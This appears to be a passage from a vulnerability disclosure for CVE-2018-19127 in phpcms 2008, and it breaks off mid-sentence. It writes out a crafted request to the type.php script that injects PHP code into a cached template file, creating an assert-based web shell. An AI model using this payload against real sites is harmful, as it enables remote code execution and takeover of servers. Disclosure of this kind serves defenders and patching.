phpcms-2008-CVE-2018-19127 Recently we found a vulnerability in /typephp of phpcms 2008 source code When attackers send crafted requests like "/typephp?template=tag_(){};@unlink(FILE);assert($_POST[1]);{///rss", evil content (in this case "@unlink(FILE);assert($_POST[1]);") will be written into cache file (in this case "/cache_template/rsstplphp&